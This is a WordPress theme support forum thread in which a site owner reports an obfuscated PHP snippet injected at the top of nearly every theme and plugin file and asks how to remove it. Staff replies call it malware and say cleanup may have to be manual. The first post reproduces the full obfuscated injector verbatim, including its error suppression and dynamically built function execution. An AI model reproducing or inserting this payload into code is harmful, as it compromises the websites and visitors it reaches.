Viewing 6 posts - 1 through 6 (of 6 total)
  • Author
    Posts
  • #649741

    Hi,

    I discovered this weird code at the very beginning of ALL theme’s and child theme’s php files.
    Installed 3 security plugins which told me that my website is not infected, no spam, no malware. Can anyone tell me what a f..k is that ? And what should I do ?

    <?php $kpyruzmzk = '|!*#91y]c9y]g2y]#>>*4-1-|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)t84:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>qnjA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4{6~6<tfs-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm) x7fw6*CW&)7gj6<*doj%7-C)fepmz!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%zR#>q%V<*#fopoV;hojepdoFdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%6<*&7-#o]s]o]s]#)fepmqyoepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7js*#j{hnpd#)tutjyfopjudovg x22)!gj}1~!<z)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sb4 162 x6f 151 x64"))) { $hiclceo x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT%}X;!sp!*#opo#>>}udovg}{;#)tutjyfopjudovg)!gj!|!*msv%)}k~~~<ftmbg!!| x24- x24gvodujpo! 52985-t.98]K4]65]D8]86]y31]278]y3f<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)fepdof./#@#/d816:+946:ce44#)zbssb!>!ssbnpe_GMFTQIQ&f_UTPI0#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]2p% x7f!~!<##!>!2p%Z<^2 x5c2b%w:!>! x246767~6<Cw6<pd%wqj%6<^#zsfvr# x5cq%7/7#@#7/7^~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)3 105 x52 137 x41 107 xif((function_exists(" x6f 142 x5f 163 x74 141 xI&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!7,27R66,#/q%>2q%<#g6R85,67R37,18h%:<#64y]552]e7y]#>n%<#372]58y]472]y)#}#-# x24- x24-tusqpt)%z-#:#* xx27&6<*rfs%7-K)fujsxX6<#opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftm27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:);}}}&;ftmbg} x7f;!osvufs}w;* x7f!>>D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tx24- x24tvctus)% x24- x24b!>!%y)gj6<^#Y# x5cq% x27Y%6<.msvftsbqA7>q%6< !>!2p%!*3>?*2b%)gpf{#}C;!>>!}W;utpi}Y;tuofuopdufhfmjg}[;ldpt%}K;ufldpt}X;msvd}R;*msv%XAZASV<*w%)ppde>u%V<#65,47%w6< x7fw6*CWtfs%)7gj6<*id%)ftp%tjw)# x24#-!#]y38#-!%w:**<“)));$vkzoaub = $hiclmfV x7f<*X&Z&S{ftmfV x7f<*)zbssb!-#}#)fepmqnj!/!#0#)idu!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssb/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmx24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24-<!%t2w>#]y74]273]y76]252]p%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudovx7fw6* x7f_*#fubfsdXk5{66~6<&w6<dz)%bbT-%bT-%hW~%fdy)##-!#~<%h0z-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##QtjUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3{666~6<w!>!#]y84]275]y83]273]y76]277#v%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22pm3qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x272*3qj%7> x2272qj%)7gj6<**2qj%)hoLd]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%t! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsutnpdov{h19275j{hnpd19275fubmgoj{h1:|]241]334]368]322]3]364]6]283]427]36]373P6]3)}.;UQPMSVD!-id%)uqpuftmsvd},;uqpuftmsvd}+;!>!} x27;!>>>!}_;gvc%3hA x27pd%6<pd%w6Z6<.2hA x27pd%6<C x27pd%6|6.7eu{66~67<&wmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSV7-K)ebfsX x27u%)7fmjix6<C "]=1; $uas=strtolower($y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#)7gj6<*QDUMPT7-NBFSUTLDPT7-UFOJGB)fubfsdXA x27K6< x7fw6f x27*&7-n%)utjm6< x7fw6*CW&>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27R25,d7R17,67R37,#/q%>U<#16,47R55c%j:^<!%wx5c^>Ew:Qb:Qc:W~!%osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3unction brwbvtq($n){return ch6]73]83]238M7]381]211M5]67]452!hmg%)!gj!~<ofmy%,3, $GLOBALS[" x61 156 x75 156 x61bg)!gj<*#k#)usbutcpV x7f x7f x7f x7f<u%V x27{ft x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}ZR;msv}.;/#/#/},;#-#}+;%-q;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#ceo(“”, $fazhdtj); $vkzoaub(sfmcnbs+yfeobz+sfwjidsbbj+upcotn+qsvmt+fmhpph# x22!pd%)!gj}Z;h!opjg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf439275ttfsq x24- x24*!|! x24- x24 x5c%j^ 1/14+9**-)1/2986+7**^fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}45 116 x54″]); if ((strstr($uas,” x6d 163 x69 145″)) or (st]51L3]84]y31M6]y3e]81#/#7e:55946-tr.9#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**11112#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<qp%>5h%!<*::::::-111112)eobsun>qp%!|Zutjyf4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+>3<!fmtf!%z>2<!%ww2)%wTW~ x24<!fwbm)%tjw)G]y6d]281Ld]245]K2]285]Ke]53&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2{6:!}7;!}6;#]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342 x24<!%ff2!>!bssbz) x24]25 x24- x24-!%x24- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,,*x24)%zW%h>EzH,2W%wN;#-E!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]$fazhdtj = implode(array_map(“b!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: xrstr($uas,” x72 166 x3a 61 x31″)) or (strstr($uas,” x61 156 x6r(ord($n)-1);} @error_reporting(0); 72 164″) && (!isset($GLOBALS[” x61 156 x75 156 x61″])))) {8y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}4726Z6<.5hA x27pd%6<pd%w6Z6<.4hA x27pd%6<pd%w6Z6<.bnhfsq)!sp!*#ojneb#-*f%)s)sutcvt)esp>hmg%!<12>j%!bq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof57ftbc x7f!|!*uyfu2l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!}.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyfx x2_SERVER[" x48 124 x54 120 x5f 125 x5rwbvtq",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265] x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!>!w)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e#>b%!**X)ufttj x22)gj!|!*nbs37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]4fxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5= " x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; fjt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2bbubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!*24- x24!>! x24/%tjw/ x24)% y72]254]y76#<!%w:!>!(%QUUI&e_SEEBFUPNFS&d_SFSFGFSQUUI&c_UOFHBSFTVQUUSTrrEvxNoITCnuF_EtaeRCxECaLPer_RtSoxapbqhzmm'; $ycijcvam=explode(chr((583-463)),substr($kpyruzmzk,(33664-27738),(199-165))); $qcnnec = $ycijcvam[0]($ycijcvam[(6-5)]); $unmwkue = $ycijcvam[0]($ycijcvam[(8-6)]); if (!function_exists('pnqtdciiz')) { function pnqtdciiz($nlzzxoitf, $fxyibziopo,$tvgmxh) { $hdxyinls = NULL; for($uurzlooq=0;$uurzlooq<(sizeof($nlzzxoitf)/2);$uurzlooq++) { $hdxyinls .= substr($fxyibziopo, $nlzzxoitf[($uurzlooq*2)],$nlzzxoitf[($uurzlooq*2)+(7-6)]); } return $tvgmxh(chr((52-43)),chr((455-363)),$hdxyinls); }; } $ukbwhbft = explode(chr((241-197)),'1334,47,4952,58,3645,31,3180,23,5330,36,1311,23,4097,59,4854,62,624,33,5676,67,3566,29,4916,36,4769,31,5366,60,5854,22,1104,24,5078,49,3027,59,424,23,3350,28,4258,37,3154,26,1600,24,489,37,2642,66,3292,58,2753,31,2708,45,1128,29,4193,65,1910,41,2422,33,287,29,167,56,2066,31,3086,68,2548,64,4493,37,4530,23,1971,69,2960,67,1803,32,3918,20,707,50,3498,68,2839,43,3378,59,3625,20,956,52,24,47,5153,24,0,24,5778,49,526,38,1074,30,1951,20,5743,35,1440,60,812,58,4345,38,1157,44,3871,47,2171,29,5127,26,5618,58,870,47,5876,50,1381,59,5529,28,5177,59,657,50,3785,25,2367,55,3938,69,2882,35,71,38,4383,40,1624,47,3676,48,2145,26,2040,26,3437,31,1500,32,366,23,5288,42,5236,52,3724,22,3746,39,3810,33,2248,38,2612,30,2342,25,3203,52,1008,66,1671,61,1532,35,5557,61,5010,68,4611,38,4007,30,1879,31,1567,33,5827,27,4649,49,757,21,2286,56,5426,46,4058,39,4295,50,2200,48,564,60,447,42,4698,23,2486,62,5472,57,1732,67,778,34,4156,37,109,58,4721,48,1835,44,389,35,4465,28,2784,55,2455,31,917,39,2917,43,3595,30,4553,58,1267,44,4037,21,1201,66,4800,54,3468,30,316,50,4423,42,3255,37,223,64,2097,48,3843,28,1799,4'); $hgipbvb = $qcnnec("",pnqtdciiz($ukbwhbft,$kpyruzmzk,$unmwkue)); $qcnnec=$kpyruzmzk; $hgipbvb(""); $hgipbvb=(461-340); $kpyruzmzk=$hgipbvb-1; ?>

    #650813

    Hey Anton,

    Seems like malware, you may have a script that infects all .php files, check if that code is also on your plugins .php files.

    Best regards,
    Josue

    #650831

    Hi Josue,

    yes actually, the code is present almost in all php files, even in those of plugins.
    Here’s the test result I’ve done: https://virustotal.com/fr/url/7ca46a0e1d847873cc18a540bd57f7691214ac3345f3f05e63eabe4a9e7187ba/analysis/
    I don’t know what is AutoShun, but it seems like the website is clean…

    Is there a program / plugin offering possibility to delete this piece of code in all .php files automatically? Coz this is impossible to do it manually.
    Maybe any other suggestions?

    #651856

    Hi,

    Is there a program / plugin offering possibility to delete this piece of code in all .php files automatically? Coz this is impossible to do it manually.
    Maybe any other suggestions?

    I don’t know of any script that can do that. I think you have to manually override the file. Do you have a lot files inside the child theme?

    Best regards,
    Ismael

    #652028

    As I mentioned abouve:

    the code is present almost in all php files, even in those of plugins.

    So, it’s not only about the child theme, but Enfold basic folder as well as all plugins

    #652375

    Hi Anton,

    Unfortunately, I doubt there is a plugin or script that can remove the malware from every PHP file that is in your WordPress installation. Removing the code might have to be done manually.

    Best regards,
    Jordan

Viewing 6 posts - 1 through 6 (of 6 total)
  • You must be logged in to reply to this topic.